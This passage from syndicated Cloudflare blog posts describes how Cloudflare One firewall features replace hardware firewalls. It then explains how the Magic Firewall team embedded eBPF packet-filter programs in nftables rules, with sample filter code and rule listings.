Additionally, to help relieve the burden of managing IP allow/block lists, Cloudflare provides a set of managed lists that can be applied to both stateless and stateful policies. And on the more sophisticated end, you can also perform deep packet inspection and write programmable packet filters to enforce a positive security model and thwart the largest of attacks.

Cloudflare’s intelligence helps power our application and content categories for our Layer 7 policies, which can be used to protect your users from security threats, prevent data exfiltration, and audit usage of company resources. This starts with our protected DNS resolver, which is built on top of our performance leading consumer 1.1.1.1 service. Protected DNS allows administrators to protect their users from navigating or resolving any known or potential security risks. Once a domain is resolved, administrators can apply HTTP policies to intercept, inspect, and filter a user’s traffic. And if those web applications are self-hosted or SaaS enabled you can even protect them using a Cloudflare access policy, which acts as a web based identity proxy.

Last but not least, to help prevent data exfiltration, administrators can lock down access to external HTTP applications by utilizing remote browser isolation. And coming soon, administrators will be able to log and filter which commands a user can execute over an SSH session.

Simplify policy management: one click to propagate rules everywhere

Traditional firewalls required deploying policies on each device or configuring and maintaining an orchestration tool to help with this process. In contrast, Cloudflare allows you to manage policies across our entire network from a simple dashboard or API, or use Terraform to deploy infrastructure as code. Changes propagate across the edge in seconds thanks to our Quicksilver technology. Users can get visibility into traffic flowing through the firewall with logs, which are now configurable.

Consolidating multiple firewall use cases in one platform

Firewalls need to cover a myriad of traffic flows to satisfy different security needs, including blocking bad inbound traffic, filtering outbound connections to ensure employees and applications are only accessing safe resources, and inspecting internal (“East/West”) traffic flows to enforce Zero Trust. Different hardware often covers one or multiple use cases at different locations; we think it makes sense to consolidate these as much as possible to improve ease of use and establish a single source of truth for firewall policies. Let’s walk through some use cases that were traditionally satisfied with hardware firewalls and explain how IT teams can satisfy them with Cloudflare One.

Protecting a branch office

Traditionally, IT teams needed to provision at least one hardware firewall per office location (multiple for redundancy). This involved forecasting the amount of traffic at a given branch and ordering, installing, and maintaining the appliance(s). Now, customers can connect branch office traffic to Cloudflare from whatever hardware they already have — any standard router that supports GRE or IPsec will work — and control filtering policies across all of that traffic from Cloudflare’s dashboard.

Step 1: Establish a GRE or IPsec tunnel
The majority of mainstream hardware providers support GRE and/or IPsec as tunneling methods. Cloudflare will provide an Anycast IP address to use as the tunnel endpoint on our side, and you configure a standard GRE or IPsec tunnel with no additional steps — the Anycast IP provides automatic connectivity to every Cloudflare data center.

Step 2: Configure network-layer firewall rules
All IP traffic can be filtered through Magic Firewall, which includes the ability to construct policies based on any packet characteristic — e.g., source or destination IP, port, protocol, country, or bit field match. Magic Firewall also integrates with IP Lists and includes advanced capabilities like programmable packet filtering.

Step 3: Upgrade traffic for application-level firewall rules
After it flows through Magic Firewall, TCP and UDP traffic can be “upgraded” for fine-grained filtering through Cloudflare Gateway. This upgrade unlocks a full suite of filtering capabilities including application and content awareness, identity enforcement, SSH/HTTP proxying, and DLP.

Replace your hardware firewalls with Cloudflare One

Protecting a high-traffic data center or VPC

Firewalls used for processing data at a high-traffic headquarters or data center location can be some of the largest capital expenditures in an IT team’s budget. Traditionally, data centers have been protected by beefy appliances that can handle high volumes gracefully, which comes at an increased cost. With Cloudflare’s architecture, because every server across our network can share the responsibility of processing customer traffic, no one device creates a bottleneck or requires expensive specialized components. Customers can on-ramp traffic to Cloudflare with BYOIP, a standard tunnel mechanism, or Cloudflare Network Interconnect, and process up to terabits per second of traffic through firewall rules smoothly.

Replace your hardware firewalls with Cloudflare One

Protecting a roaming or hybrid workforce

In order to connect to corporate resources or get secure access to the Internet, users in traditional network architectures establish a VPN connection from their devices to a central location where firewalls are located. There, their traffic is processed before it’s allowed to its final destination. This architecture introduces performance penalties and while modern firewalls can enable user-level controls, they don’t necessarily achieve Zero Trust. Cloudflare enables customers to use a device client as an on-ramp to Zero Trust policies; watch out for more updates later this week on how to smoothly deploy the client at scale.

Replace your hardware firewalls with Cloudflare One

What’s next

We can’t wait to keep evolving this platform to serve new use cases. We’ve heard from customers who are interested in expanding NAT Gateway functionality through Cloudflare One, who want richer analytics, reporting, and user experience monitoring across all our firewall capabilities, and who are excited to adopt a full suite of DLP features across all of their traffic flowing through Cloudflare’s network. Updates on these areas and more are coming soon (stay tuned).

Cloudflare’s new firewall capabilities are available for enterprise customers today. Learn more here and check out the Oahu Program to learn how you can migrate from hardware firewalls to Zero Trust — or talk to your account team to get started today.

How We Used eBPF to Build Programmable Packet Filtering in Magic Firewall

Post Syndicated from Chris J Arges original https://blog.cloudflare.com/programmable-packet-filtering-with-magic-firewall/

How We Used eBPF to Build Programmable Packet Filtering in Magic Firewall

How We Used eBPF to Build Programmable Packet Filtering in Magic Firewall

Cloudflare actively protects services from sophisticated attacks day after day. For users of Magic Transit, DDoS protection detects and drops attacks, while Magic Firewall allows custom packet-level rules, enabling customers to deprecate hardware firewall appliances and block malicious traffic at Cloudflare’s network. The types of attacks and sophistication of attacks continue to evolve, as recent DDoS and reflection attacks against VoIP services targeting protocols such as Session Initiation Protocol (SIP) have shown. Fighting these attacks requires pushing the limits of packet filtering beyond what traditional firewalls are capable of. We did this by taking best of class technologies and combining them in new ways to turn Magic Firewall into a blazing fast, fully programmable firewall that can stand up to even the most sophisticated of attacks.

Magical Walls of Fire

Magic Firewall is a distributed stateless packet firewall built on Linux nftables. It runs on every server, in every Cloudflare data center around the world. To provide isolation and flexibility, each customer’s nftables rules are configured within their own Linux network namespace.

How We Used eBPF to Build Programmable Packet Filtering in Magic Firewall

This diagram shows the life of an example packet when using Magic Transit, which has Magic Firewall built in. First, packets go into the server and DDoS protections are applied, which drops attacks as early as possible. Next, the packet is routed into a customer-specific network namespace, which applies the nftables rules to the packets. After this, packets are routed back to the origin via a GRE tunnel. Magic Firewall users can construct firewall statements from a single API, using a flexible Wirefilter syntax. In addition, rules can be configured via the Cloudflare dashboard, using friendly UI drag and drop elements.

Magic Firewall provides a very powerful syntax for matching on various packet parameters, but it is also limited to the matches provided by nftables. While this is more than sufficient for many use cases, it does not provide enough flexibility to implement the advanced packet parsing and content matching we want. We needed more power.

Hello eBPF, meet Nftables!

When looking to add more power to your Linux networking needs, Extended Berkeley Packet Filter (eBPF) is a natural choice. With eBPF, you can insert packet processing programs that execute in the kernel, giving you the flexibility of familiar programming paradigms with the speed of in-kernel execution. Cloudflare loves eBPF and this technology has been transformative in enabling many of our products. Naturally, we wanted to find a way to use eBPF to extend our use of nftables in Magic Firewall. This means being able to match, using an eBPF program within a table and chain as a rule. By doing this we can have our cake and eat it too, by keeping our existing infrastructure and code, and extending it further.

If nftables could leverage eBPF natively, this story would be much shorter; alas, we had to continue our quest. To get us started in our search, we know that iptables integrates with eBPF. For example, one can use iptables and a pinned eBPF program for dropping packets with the following command:

iptables -A INPUT -m bpf --object-pinned /sys/fs/bpf/match -j DROP

This clue helped to put us on the right path. Iptables uses the xt_bpf extension to match on an eBPF program. This extension uses the BPF_PROG_TYPE_SOCKET_FILTER eBPF program type, which allows us to load the packet information from the socket buffer and return a value based on our code.

Since we know iptables can use eBPF, why not just use that? Magic Firewall currently leverages nftables, which is a great choice for our use case due to its flexibility in syntax and programmable interface. Thus, we need to find a way to use the xt_bpf extension with nftables.

How We Used eBPF to Build Programmable Packet Filtering in Magic Firewall

This diagram helps explain the relationship between iptables, nftables and the kernel. The nftables API can be used by both the iptables and nft userspace programs, and can configure both xtables matches (including xt_bpf) and normal nftables matches.

This means that given the right API calls (netlink/netfilter messages), we can embed an xt_bpf match within an nftables rule. In order to do this, we need to understand which netfilter messages we need to send. By using tools such as strace, Wireshark, and especially using the source we were able to construct a message that could append an eBPF rule given a table and chain.

NFTA_RULE_TABLE table
NFTA_RULE_CHAIN chain
NFTA_RULE_EXPRESSIONS | NFTA_MATCH_NAME
	NFTA_LIST_ELEM | NLA_F_NESTED
	NFTA_EXPR_NAME "match"
		NLA_F_NESTED | NFTA_EXPR_DATA
		NFTA_MATCH_NAME "bpf"
		NFTA_MATCH_REV 1
		NFTA_MATCH_INFO ebpf_bytes	

The structure of the netlink/netfilter message to add an eBPF match should look like the above example. Of course, this message needs to be properly embedded and include a conditional step, such as a verdict, when there is a match. The next step was decoding the format of `ebpf_bytes` as shown in the example below.

 struct xt_bpf_info_v1 {
	__u16 mode;
	__u16 bpf_program_num_elem;
	__s32 fd;
	union {
		struct sock_filter bpf_program[XT_BPF_MAX_NUM_INSTR];
		char path[XT_BPF_PATH_MAX];
	};
};

The bytes format can be found in the kernel header definition of struct xt_bpf_info_v1. The code example above shows the relevant parts of the structure.

The xt_bpf module supports both raw bytecodes, as well as a path to a pinned ebpf program. The later mode is the technique we used to combine the ebpf program with nftables.

With this information we were able to write code that could create netlink messages and properly serialize any relevant data fields. This approach was just the first step, we are also looking into incorporating this into proper tooling instead of sending custom netfilter messages.

Just Add eBPF

Now we needed to construct an eBPF program and load it into an existing nftables table and chain. Starting to use eBPF can be a bit daunting. Which program type do we want to use? How do we compile and load our eBPF program? We started this process by doing some exploration and research.

First we constructed an example program to try it out.

SEC("socket")
int filter(struct __sk_buff *skb) {
  /* get header */
  struct iphdr iph;
  if (bpf_skb_load_bytes(skb, 0, &iph, sizeof(iph))) {
    return BPF_DROP;
  }

  /* read last 5 bytes in payload of udp */
  __u16 pkt_len = bswap_16(iph.tot_len);
  char data[5];
  if (bpf_skb_load_bytes(skb, pkt_len - sizeof(data), &data, sizeof(data))) {
    return BPF_DROP;
  }

  /* only packets with the magic word at the end of the payload are allowed */
  const char SECRET_TOKEN[5] = "xyzzy";
  for (int i = 0; i < sizeof(SECRET_TOKEN); i++) {
    if (SECRET_TOKEN[i] != data[i]) {
      return BPF_DROP;
    }
  }

  return BPF_OK;
}

The excerpt mentioned is an example of an eBPF program that only accepts packets that have a magic string at the end of the payload. This requires checking the total length of the packet to find where to start the search. For clarity, this example omits error checking and headers.

Once we had a program, the next step was integrating it into our tooling. We tried a few technologies to load the program, like BCC, libbpf, and we even created a custom loader. Ultimately, we ended up using cilium’s ebpf library, since we are using Golang for our control-plane program and the library makes it easy to generate, embed and load eBPF programs.

# nft list ruleset
table ip mfw {
	chain input {
		#match bpf pinned /sys/fs/bpf/mfw/match drop
	}
}

Once the program is compiled and pinned, we can add matches into nftables using netlink commands. Listing the ruleset shows the match is present. This is incredible! We are now able to deploy custom C programs to provide advanced matching inside a Magic Firewall ruleset!

More Magic

With the addition of eBPF to our toolkit, Magic Firewall is an even more flexible and powerful way to protect your network from bad actors. We are now able to look deeper into packets and implement more complex matching logic than nftables alone could provide. Since our firewall is running as software on all Cloudflare servers, we can quickly iterate and update features.

One outcome of this project is SIP protection, which is currently in beta. That’s only the beginning. We are currently exploring using eBPF for protocol validations, advanced field matching, looking into payloads, and supporting even larger sets of IP lists.

We welcome your help here, too! If you have other use cases and ideas, please talk to your account team. If you find this technology interesting, come join our team!